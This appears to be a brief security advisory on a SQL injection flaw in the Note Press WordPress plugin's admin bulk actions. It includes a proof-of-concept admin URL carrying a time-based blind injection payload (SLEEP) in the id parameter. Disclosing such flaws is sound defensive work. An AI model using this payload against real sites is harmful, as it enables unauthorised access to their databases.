The plugin does not sanitise and escape the ids from the bulk actions before using them in a SQL statement in an admin page, leading to an SQL injection
https;//example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&_wpnonce=e4ee1ce89d&action;=delete&paged;=1&id;%5B%5D=18+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)&id;%5B%5D=19&action2;=delete
CPE | Name | Operator | Version |
---|---|---|---|
note-press | eq | * |